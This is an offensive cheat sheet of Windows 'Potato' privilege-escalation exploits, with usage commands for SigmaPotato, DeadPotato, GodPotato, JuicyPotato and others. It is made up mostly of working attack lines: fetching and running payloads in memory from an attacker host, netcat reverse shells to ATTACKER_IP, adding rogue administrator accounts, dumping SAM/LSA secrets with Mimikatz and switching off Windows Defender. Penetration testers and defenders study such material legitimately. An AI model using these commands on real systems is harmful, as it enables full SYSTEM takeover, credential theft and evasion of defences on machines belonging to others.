Potato Exploits

Links for reference:

1. https://github.com/AtvikSecurity/CentralizedPotatoes

2. https://jlajara.gitlab.io/Potatoes_Windows_Privesc

3. https://github.com/tylerdotrar/SigmaPotato.git

1) Sigma Potato

Load binary

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

Gain a reverse shell

.\SigmaPotato.exe --revshell ATTACK_IP PORT

Run a command

.\SigmaPotato.exe COMMAND

Powershell Implementation

iex(new-object net.webclient).downloadstring('http://ATTACK_IP/Invoke-SigmaPotato.ps1')
Invoke-SigmaPotato -Command COMMAND
Invoke-SigmaPotato -Command "--revshell ATTACK_IP PORT"

2) Dead Potato

Link: https://github.com/lypd0/DeadPotato

Usage

Is the SeImpersonatePrivilege right enabled in your context? With DeadPotato, it is possible to achieve maximum privileges on the local system.

The tool will attempt to start an elevated process running in the context of the NT AUTHORITY\SYSTEM user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.

C:\Users\lypd0> GodPotato.exe

⠀⢀⣠⣤⣤⣄⡀⠀    _           _
⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
    ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

 -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

 -> deadpotato.exe -cmd "whoami"
 -> deadpotato.exe -rev 192.168.10.30:9001
 -> deadpotato.exe -exe payload.exe
 -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
 -> deadpotato.exe -shell
 -> deadpotato.exe -mimi sam
 -> deadpotato.exe -defender off
 -> deadpotato.exe -sharphound

 (*) Available Modules:

 - cmd: Execute a command as NT AUTHORITY\SYSTEM.
 - rev: Attempts to establish a reverse shell connection to the provided host
 - exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
 - newadmin: Create a new administrator user on the local system.
 - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
 - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write Mimikatz to disk!)
 - defender: Either enables or disables Windows Defender's real-time protection.
 - sharphound: Attempts to collect domain data for BloodHound.

3) Bat Potato

Link: https://github.com/0x4xel/Bat-Potato

Usage

Attacker:

python Bat-Potato.py

Server will be listening incomming requests. Keep that connection alive, open new tab and open another listening port for the reverse shell.

rlwrap nc -lvnp 4444

You must upload the following files on the server:

• wget.exe

• Bat-Potato.bat file generated by python script

On the server, execute

.\Bat-Potato.bat

This will upload shell.bat, nc.exe and Juicy binary from server and will attempt to Privesc making all the CLSID request automatically.

4) God Potato

Link: https://github.com/BeichenDream/GodPotato

Requirements: Check which .NET version is installed on the machine

reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s

Then you can use GodPotato for the versions:

2
3.5
4

1. Run commands

    GodPotato -cmd "cmd /c whoami"

2. Execute reverse shell

    GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe ATTACKER_IP PORT"

5) Rogue Potato

You need to have a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim

Link: https://github.com/k4sth4/Rogue-Potato

1. Run on your machine the socat redirection

   socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

2. Execute PoC

   .\RoguePotato.exe -r YOUR_IP -e "command" -l 9999

6) SharpEfsPotato

Link: https://github.com/bugch3ck/SharpEfsPotato

Command:

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami"

7) DCOMPotato

Link: https://github.com/zcgonvh/DCOMPotato

Revshell Command:

DCOMPotato.exe -c "C:\Windows\System32\nc.exe -e cmd.exe [ATTACKER_IP] 4444"

Create a new user and make him admin

DCOMPotato.exe -c "C:\Windows\System32\net.exe user emma Password123 /add"
DCOMPotato.exe -c "C:\Windows\System32\net.exe localgroup Administrators emma /add"

8) JuicyPotato

x64 Link: https://github.com/ohpe/juicy-potato/releases/tag/v0.1 x86 Link: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/tag/1.2

CLSIDs are contained within the x64 repository. Otherwise, you can find them in this link:

https://ohpe.it/juicy-potato/CLSID/

Revshell command

.\Juicy.Potato.x86.exe -t * -p c:\windows\system32\cmd.exe -a "/c C:\wamp\bin\apache\Apache2.2.21\nc.exe ATTACK_IP PORT -e cmd.exe" -l 1337 -c "{3c6859ce-230b-48a4-be6c-932c0c202048}"

Add the user to administrators

.\Juicy.Potato.x86.exe -t * -p c:\windows\system32\cmd.exe -a "/c net localgroup administrators USER /add" -l 1337 -c "{3c6859ce-230b-48a4-be6c-932c0c202048}"